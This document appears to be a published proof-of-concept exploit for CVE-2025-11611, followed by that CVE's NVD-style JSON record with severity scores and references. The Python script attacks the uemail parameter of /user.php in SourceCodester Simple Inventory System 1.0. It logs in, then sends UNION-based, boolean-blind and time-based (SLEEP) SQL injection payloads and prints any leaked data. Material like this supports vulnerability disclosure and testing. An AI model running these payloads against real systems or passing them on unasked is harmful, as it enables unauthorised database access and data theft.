CVE-2025-11611

# CVE-2025-11611 PoC - SQL Injection in SourceCodester Simple Inventory System 1.0 # Vulnerable file: /user.php # Vulnerable parameter: uemail import requests # Target configuration TARGET_URL = "http://target.com/user.php" USERNAME = "test_user" PASSWORD = "test_password" # Login to obtain session session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } session.post(TARGET_URL, data=login_data) # SQL Injection payload for uemail parameter # Using UNION-based injection to extract database information sql_payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -" # Inject payload into uemail parameter injection_data = { "uemail": sql_payload, # Add other required parameters } # Send the malicious request response = session.post(TARGET_URL, data=injection_data) # Check response for leaked data if "error" not in response.text.lower(): print("SQL Injection successful!") print(response.text) else: print("Injection failed or blocked") # Alternative: Boolean-based blind SQL injection def check_injection(url, session, param_name='uemail'): """Check if the parameter is vulnerable to SQL injection""" # Normal request normal_payload = "[email protected]" # True condition true_payload = "[email protected]' AND '1'='1" # False condition false_payload = "[email protected]' AND '1'='2" # Compare responses data_normal = {param_name: normal_payload} data_true = {param_name: true_payload} data_false = {param_name: false_payload} r_normal = session.post(url, data=data_normal) r_true = session.post(url, data=data_true) r_false = session.post(url, data=data_false) if r_true.text != r_false.text: print(f"[+] Parameter '{param_name}' is vulnerable to SQL injection!") return True return False # Time-based blind SQL injection example def extract_data_time_based(url, session, param_name='uemail'): """Extract data using time-based blind SQL injection""" # MySQL SLEEP injection payload = "[email protected]' AND SLEEP(5)-- -" data = {param_name: payload} import time start_time = time.time() response = session.post(url, data=data) elapsed_time = time.time() - start_time if elapsed_time > 4: print(f"[+] Time-based SQL injection confirmed (delay: {elapsed_time:.2f}s)") return True return False

{"cve": {"id": "CVE-2025-11611", "sourceIdentifier": "[email protected]", "published": "2025-10-11T19:15:33.870", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in SourceCodester Simple Inventory System 1.0. Impacted is an unknown function of the file /user.php. This manipulation of the argument uemail causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:simple_inventory_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "41C57D87-9ACB-47DB-AA55-5848DBADB647"}]}]}], "references": [{"url": "https://github.com/yihaofuweng/cve/issues/53", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327938", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327938", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672660", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yihaofuweng/cve/issues/53", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}